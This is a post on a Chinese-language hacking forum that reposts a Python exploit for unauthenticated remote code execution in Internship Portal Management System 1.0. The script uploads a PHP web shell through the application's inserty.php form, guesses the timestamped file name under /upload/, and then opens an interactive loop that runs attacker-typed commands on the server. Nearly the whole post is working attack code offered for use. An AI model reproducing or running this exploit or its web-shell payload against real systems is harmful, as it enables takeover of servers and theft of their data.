跳转到帖子

  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated)

 分享
HACK1949

HACK1949
CHT漏洞数据库

推荐的帖子

HACK1949 Grand Master

HACK1949

发布于
发布于 
# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
# Date: 2021-05-04
# Exploit Author: argenestel
# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested on: Debian 10

import requests
import time

#change the url to the site running the vulnerable system
url="http://127.0.0.1:4000"
#burp proxy
proxies = {
 "http": "http://127.0.0.1:8080",
}
#payload
payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'

#the upload point
insert_url=url+"/inserty.php"

def fill_details():
    global payload
    global shellend
    global shellstart
    print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
    #time start
    shellstart=int(time.time())
    #print(shellstart)
    files  = {'file':('shell.php',payload,
                    'image/png', {'Content-Disposition': 'form-data'}
                  )
              }
    data = {
            "company_name":"some",
            "first_name":"some",
            "last_name":"some",
            "email":"some@some.com",
            "gender":"Male",
            "insert_button":"Apply",
            "terms":"on"
    }
    r = requests.post(insert_url, data=data, files=files)
    if r.status_code == 200:
        print("Exploited Intern System Successfully...")
        shellend = int(time.time())
        #print(shellend)
        shell()
    else:
        print("Exploit Failed")

def shell():
    for shellname in range(shellstart, shellend+1):
        shellstr=str(shellname)
        shell_url=url+"/upload/"+shellstr+"_shell.php"
        r = requests.get(shell_url)
        if r.status_code == 200:
            shell_url=url+"/upload/"+shellstr+"_shell.php"
            break
    
    r = requests.get(shell_url)
    if r.status_code == 200:
        print("Shell Starting...")
        while True:
            cmd=input("cmd$ ")
            r = requests.get(shell_url+"?cmd="+cmd)
            print(r.text)
    else:
        print("File Name Error")


fill_details()
链接帖子
意见的链接
分享到其他网站
 分享
转到主题列表

黑客攻防讨论组

黑客攻防讨论组

  
    You don't have permission to chat.

    • 最近浏览   0位会员

      • 没有会员查看此页面。

    黑客世界站内导航 (SITE MAP)

    ×
    ×
    • 创建新的...